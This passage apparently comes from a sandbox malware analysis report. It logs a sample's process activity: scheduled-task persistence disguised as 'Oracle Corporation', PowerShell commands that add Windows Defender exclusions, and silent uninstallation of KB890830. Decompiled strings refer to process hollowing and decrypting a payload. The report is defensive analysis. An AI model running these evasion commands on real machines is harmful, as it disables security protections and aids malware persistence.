Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	11:51:03
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	11:51:03
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	11:51:03
Start date:	12/01/2025
Path:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Imagebase:	0x7ff79aa00000
File size:	1'245'320 bytes
MD5 hash:	DD36F6F79E68D5E54C75527DB2DA97AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	11:51:03
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	11:51:03
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	11:51:14
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff744460000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6564, Parent PID: 6520

General

Target ID:	81
Start time:	11:51:14
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	11:51:14
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	11:51:14
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	11:51:14
Start date:	12/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff7a5710000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	11:51:14
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6924, Parent PID: 6920

General

Target ID:	86
Start time:	11:51:14
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	11:51:25
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	11:51:25
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	11:51:25
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	11:51:25
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	11:51:25
Start date:	12/01/2025
Path:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe
Imagebase:	0x7ff779850000
File size:	1'245'320 bytes
MD5 hash:	DD36F6F79E68D5E54C75527DB2DA97AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	11:51:25
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	93
Start time:	11:51:25
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	11:51:35
Start date:	12/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff744460000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	11:51:35
Start date:	12/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	11:51:35
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	11:51:35
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	11:51:35
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	11:51:35
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	11:51:36
Start date:	12/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff7a5710000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	101
Start time:	11:51:46
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	102
Start time:	11:51:46
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	103
Start time:	11:51:46
Start date:	12/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	104
Start time:	11:51:46
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	124
Start time:	11:52:01
Start date:	12/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	48.1%
Total number of Nodes:	54
Total number of Limit Nodes:	2

Executed Functions

Function 00007FF7796F1160 Relevance: 13.6, APIs: 9, Instructions: 130
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF7796F1156), ref: 00007FF7796F11A5
_amsg_exit.MSVCRT(?,?,?,00007FF7796F1156), ref: 00007FF7796F11CC
_initterm.MSVCRT ref: 00007FF7796F120F
SetUnhandledExceptionFilter.KERNEL32(?,?,?,00007FF7796F1156), ref: 00007FF7796F124E
malloc.MSVCRT ref: 00007FF7796F127E
strlen.MSVCRT ref: 00007FF7796F12A4
malloc.MSVCRT ref: 00007FF7796F12B0
memcpy.MSVCRT ref: 00007FF7796F12C3
_cexit.MSVCRT(?,?,?,00007FF7796F1156), ref: 00007FF7796F132D

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
String ID:
API String ID: 2643109117-0
Opcode ID: db9654a873d05972df7c4cd3774028c37a5ca561359b6cfc46425ec131679173
Instruction ID: 859b55a210e303dee70b12cdf0393a1db81a695c45785cc585f8ddacaf8ac112
Opcode Fuzzy Hash: db9654a873d05972df7c4cd3774028c37a5ca561359b6cfc46425ec131679173
Instruction Fuzzy Hash: 0E512D73A7A647C5E610FF15E95037AE2B3AF887D0F815935C90D873A1EE2CA4928360

Function 00007FF7796F1394 Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAccessCheckAndAuditAlarm.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7796F1156), ref: 00007FF7796F13F7

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: AccessAlarmAuditCheck
String ID:
API String ID: 3751321277-0
Opcode ID: 27820dc2d2f6668a26f19431ae4115d453894afd47fcb02c8a0a545cebde311c
Instruction ID: 797ff8d0504be303928bad8b3b24b7f54397fde58dac6c28fada1ec54cdc10f8
Opcode Fuzzy Hash: 27820dc2d2f6668a26f19431ae4115d453894afd47fcb02c8a0a545cebde311c
Instruction Fuzzy Hash: 6FF06672A3AB42C6D620EF51F8515AAB771FB89BC0B405835EA8C56725DF3CE1508BA0

Non-executed Functions

Function 00007FF779713B80 Relevance: 140.1, APIs: 67, Strings: 12, Instructions: 1888COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF779713CA1
memset.MSVCRT ref: 00007FF779713DC9
wcscat.MSVCRT ref: 00007FF779713DD9
memset.MSVCRT ref: 00007FF779713DED
wcslen.MSVCRT ref: 00007FF779713E56
_wcsnicmp.MSVCRT ref: 00007FF779713E89
wcslen.MSVCRT ref: 00007FF779713E95
wcscpy.MSVCRT ref: 00007FF779713F23
wcscat.MSVCRT ref: 00007FF779713F32
memset.MSVCRT ref: 00007FF779713F43
wcscpy.MSVCRT ref: 00007FF77971406B
wcscat.MSVCRT ref: 00007FF77971407A
memset.MSVCRT ref: 00007FF779714097
wcslen.MSVCRT ref: 00007FF779714113
_wcsnicmp.MSVCRT ref: 00007FF779714139
wcslen.MSVCRT ref: 00007FF779714149
wcscpy.MSVCRT ref: 00007FF779714362
wcscat.MSVCRT ref: 00007FF779714371
_wcsicmp.MSVCRT ref: 00007FF779714380
memset.MSVCRT ref: 00007FF7797143B1
wcscpy.MSVCRT ref: 00007FF779714419
wcscat.MSVCRT ref: 00007FF779714428
memset.MSVCRT ref: 00007FF77971443C
wcscpy.MSVCRT ref: 00007FF7797144C2
wcscat.MSVCRT ref: 00007FF7797144D1
memset.MSVCRT ref: 00007FF7797144E5
wcscpy.MSVCRT ref: 00007FF779714538
wcscat.MSVCRT ref: 00007FF779714547
memset.MSVCRT ref: 00007FF77971455B
wcscpy.MSVCRT ref: 00007FF7797145EE
wcscat.MSVCRT ref: 00007FF7797145FD
memset.MSVCRT ref: 00007FF779714611
wcscpy.MSVCRT ref: 00007FF779714679
wcscat.MSVCRT ref: 00007FF779714688
memset.MSVCRT ref: 00007FF77971469C
wcslen.MSVCRT ref: 00007FF779714705
_wcsnicmp.MSVCRT ref: 00007FF779714739
wcslen.MSVCRT ref: 00007FF779714745
wcscat.MSVCRT ref: 00007FF77971476C
memset.MSVCRT ref: 00007FF779714780
wcscpy.MSVCRT ref: 00007FF77971480F
wcscat.MSVCRT ref: 00007FF77971481E
memset.MSVCRT ref: 00007FF779714B0A
wcscpy.MSVCRT ref: 00007FF779714B70
wcscat.MSVCRT ref: 00007FF779714B7F

Part of subcall function 00007FF779718410: memset.MSVCRT ref: 00007FF77971842F
Part of subcall function 00007FF779718410: wcscpy.MSVCRT ref: 00007FF779718490
Part of subcall function 00007FF779718410: wcscat.MSVCRT ref: 00007FF77971849B
Part of subcall function 00007FF779718410: wcslen.MSVCRT ref: 00007FF7797184AC

wcslen.MSVCRT ref: 00007FF779714C97
wcslen.MSVCRT ref: 00007FF779714DFA
_wcsicmp.MSVCRT ref: 00007FF779714E67

Part of subcall function 00007FF7797179B0: memset.MSVCRT ref: 00007FF7797179DD

memset.MSVCRT ref: 00007FF779714FB5
wcscpy.MSVCRT ref: 00007FF779715044
wcscat.MSVCRT ref: 00007FF779715053
memset.MSVCRT ref: 00007FF7797150A7
wcscpy.MSVCRT ref: 00007FF7797150B9
wcscat.MSVCRT ref: 00007FF7797150C8
_wcsicmp.MSVCRT ref: 00007FF779715264
memset.MSVCRT ref: 00007FF779715283
wcscpy.MSVCRT ref: 00007FF7797152E4
wcscat.MSVCRT ref: 00007FF7797152F6
wcslen.MSVCRT ref: 00007FF779715309

Part of subcall function 00007FF779717F20: memset.MSVCRT ref: 00007FF779717F82
Part of subcall function 00007FF779717F20: memset.MSVCRT ref: 00007FF779718015
Part of subcall function 00007FF779717F20: wcscpy.MSVCRT ref: 00007FF77971806D
Part of subcall function 00007FF779717F20: wcscat.MSVCRT ref: 00007FF779718078
Part of subcall function 00007FF779717F20: wcslen.MSVCRT ref: 00007FF779718089

wcslen.MSVCRT ref: 00007FF77971576B
memset.MSVCRT ref: 00007FF779715831
wcslen.MSVCRT ref: 00007FF77971589A
_wcsnicmp.MSVCRT ref: 00007FF7797158C9
wcslen.MSVCRT ref: 00007FF7797158D5
wcscat.MSVCRT ref: 00007FF7797158FC
memset.MSVCRT ref: 00007FF779715B5B
memcpy.MSVCRT ref: 00007FF779716196

Strings

[INFO] Process handle closed, xrefs: 00007FF779715CCF
[INFO] Process hollowing executed for program: %s, xrefs: 00007FF779715C9F
[SUCCESS] Payload decrypted, size: %zu bytes, xrefs: 00007FF779715978
[INFO] Mutex not found: %s, xrefs: 00007FF779715938
, xrefs: 00007FF779715371
[INFO] Mutex already exists: %s, xrefs: 00007FF779715803
[ERROR] Invalid process handle, xrefs: 00007FF779715CE0
[SUCCESS] Process handle obtained: 0x%p, xrefs: 00007FF779715CB8
[INFO] inject_process completed, xrefs: 00007FF779715816
VlwdBRpVDxIeEBMWCl9QWFxaRVcNBw8XCQIZF1ZKICIsTlReVEpHemZfLhgXCVIfFxgUHgcHUVpcRURSSxAYGgQQWEoeAQ0HVkxVCgcKFwQTGUkaAQoeFx4EEQRFCxobRRQMBhIaDgRDUUpJUE1CW10HDgNHHQ0LBklJfWFIVUo+EQwPERALBFJucFlEQlJVMAUIAzwbBR8KDgVOZmJVVmNDRVQzGxgVAAYeRxAQBwxORSIZCQsAHQlVenpLSFVWVkwn, xrefs: 00007FF7797150E5
[INFO] inject_process started, xrefs: 00007FF77971574A
[ERROR] Failed to decrypt payload, xrefs: 00007FF779715B3D

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: memset$wcscat$wcscpywcslen$_wcsnicmp$_wcsicmp$memcpy
String ID: $VlwdBRpVDxIeEBMWCl9QWFxaRVcNBw8XCQIZF1ZKICIsTlReVEpHemZfLhgXCVIfFxgUHgcHUVpcRURSSxAYGgQQWEoeAQ0HVkxVCgcKFwQTGUkaAQoeFx4EEQRFCxobRRQMBhIaDgRDUUpJUE1CW10HDgNHHQ0LBklJfWFIVUo+EQwPERALBFJucFlEQlJVMAUIAzwbBR8KDgVOZmJVVmNDRVQzGxgVAAYeRxAQBwxORSIZCQsAHQlVenpLSFVWVkwn$[ERROR] Failed to decrypt payload$[ERROR] Invalid process handle$[INFO] Mutex already exists: %s$[INFO] Mutex not found: %s$[INFO] Process handle closed$[INFO] Process hollowing executed for program: %s$[INFO] inject_process completed$[INFO] inject_process started$[SUCCESS] Payload decrypted, size: %zu bytes$[SUCCESS] Process handle obtained: 0x%p
API String ID: 1844779378-2110838316
Opcode ID: 50f3b661096dc7b1e19b12610b6c206130408c8fe2271caf19ca8527248b59a1
Instruction ID: decc03c90cdf1112e3c2f2827ba1aea1c647a8bdc9188ba7425db820ff907c50
Opcode Fuzzy Hash: 50f3b661096dc7b1e19b12610b6c206130408c8fe2271caf19ca8527248b59a1
Instruction Fuzzy Hash: CF335E63CBE683C5F311AF28A8423F4E370BF99384F845A39D98C565A1EF6C6255C364

Function 00007FF779700A70 Relevance: 57.8, APIs: 24, Strings: 8, Instructions: 1785stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF779700B79

Strings

__uuidof, xrefs: 00007FF779701D00
starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF779701E55, 00007FF77970367F
throw, xrefs: 00007FF779701B4C
this, xrefs: 00007FF779703307
operator, xrefs: 00007FF779700B92
noexcept , xrefs: 00007FF779703C36
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF779701E5C, 00007FF779703686
operator, xrefs: 00007FF77970359C

Memory Dump Source

Source File: 00000000.00000002.1811471947.00007FF7796F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7796F0000, based on PE: true

Associated: 00000000.00000002.1811456826.00007FF7796F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811509481.00007FF779719000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811524538.00007FF779723000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811539150.00007FF779724000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811629144.00007FF77981C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811645401.00007FF77981F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1811660975.00007FF779823000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7796f0000_sE5IdDeTp2.jbxd

Similarity

API ID: strlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$__uuidof$noexcept $operator$operator$starts_with(Res, "operator") && "operator name does not start with 'operator'"$this$throw
API String ID: 39653677-1316449214
Opcode ID: eeeaa255a0b47bf375ba76d33c8e646cc80b874b038ff034130d583932985c51
Instruction ID: 624e861d44e7db74e5d57e8c33a682c0b8f33aefbc957ee05b3928c334ba8331
Opcode Fuzzy Hash: eeeaa255a0b47bf375ba76d33c8e646cc80b874b038ff034130d583932985c51
Instruction Fuzzy Hash: 05E2E523A3AB8381EAA19F19E940379A7B1EB49BD0F844131DE9D07795EF3CE551C390

Function 00007FF779706520 Relevance: 37.2, APIs: 16, Strings: 5, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

realloc.MSVCRT ref: 00007FF7797066DC
malloc.MSVCRT ref: 00007FF779706735
malloc.MSVCRT ref: 00007FF7797067D7
malloc.MSVCRT ref: 00007FF77970684C
memcpy.MSVCRT ref: 00007FF77970686B
realloc.MSVCRT ref: 00007FF7797068CB
memchr.MSVCRT ref: 00007FF77970694E
